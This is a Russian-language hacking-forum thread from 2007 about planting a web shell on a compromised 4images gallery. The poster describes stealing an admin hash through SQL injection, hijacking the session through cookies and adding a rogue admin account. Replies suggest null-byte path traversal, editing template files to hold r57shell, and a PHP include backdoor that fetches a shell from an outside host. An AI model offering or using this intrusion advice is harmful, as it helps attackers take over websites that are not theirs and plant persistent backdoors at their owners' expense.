Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Загрузка шелла в 4images используя админ панель. |
17.01.2007, 12:38
|
|
Участник форума
Регистрация: 25.06.2006
Сообщений: 220
Провел на форуме:
2052669
Репутация:
178
|
|
Загрузка шелла в 4images используя админ панель.
Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Ошибка при загрузке фотографии:
rem.php: Неправильный формат файла (php, application/octet-stream)
Я даже низнаю что придумать. Мож кто подскажет ?
Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
http://Типа сайт/gallery/index.php?template=../../data/tmp_media/135.jpg%00
Выдает:
Parse error: parse error, unexpected '<', expecting ',' or ';' in
z:\home\Типа сайт\images\includes\template.php(133) : eval()'d code on line 29
Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,
Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает. |
|
|
18.01.2007, 02:54
|
|
Banned
Регистрация: 14.01.2007
Сообщений: 1
Провел на форуме:
49442
Репутация:
0
|
|
Сообщение от GrAmOzEkA
Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю.
Пытаюсь залить шелл вылазиет:
Я даже низнаю что придумать. Мож кто подскажет ?
Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке:
Выдает:
Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером.
Скорее всего там стоит фильтр на символы: < ; ,
Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.
я конешно в этом ничего не понимаю, но я видел видео где перед заливом шела(вроди)чел убирал .php 
Или это php-инъекция была. 
|
|
|
|
18.01.2007, 03:02
|
|
Постоянный
Регистрация: 25.07.2005
Сообщений: 471
Провел на форуме:
3465924
Репутация:
931
|
|
А ты не думал, что может стоять самописный антишелл?
Если ты говоришь про галерею одной игры, то там такой и стоит...так что можешь не мучаться...
|
|
|
|
20.01.2007, 20:57
|
|
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
Провел на форуме:
1867718
Репутация:
268
|
|
конкретно с этим скриптом не работал, но можно как вариант если там можно редактировать файлы скинов, то можно попробовать внедрить шелл туды. Поищи еще какие нить скрипты на серваке, может там где нить форум есть.
А может ты неправильно указал тип файла при добавлении нового типа загружаемых файлов.
|
|
|
|
21.01.2007, 12:47
|
|
Участник форума
Регистрация: 31.08.2006
Сообщений: 149
Провел на форуме:
1763379
Репутация:
155
|
|
попробуй отредактировать в шаблонах какой нибуть файл (например phpinfo.php), а потом запустить... admin/phpinfo.php (запиши туда нормальный r57shell) у меня получалось...
|
|
|
|
05.03.2007, 11:28
|
|
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553
Репутация:
1316
|
|
C:\home\sitex.ru\images\d\1.php on line 1
Когда выполняю команду: 1.php?cmd=ls -la просто белый экран.
Сам то понимаешь что это значит? )
попробуй к примеру команду dir
|
|
|
|
06.03.2007, 11:59
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
если команда dir показала листинг дериктории то сервер на винде.. и wget wput нет..
|
|
|
|
06.03.2007, 12:12
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
сделай не passthru(); а
PHP код:
<? include($_GET["inc"]); ?>
и инклудь нормальный шелл 123.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
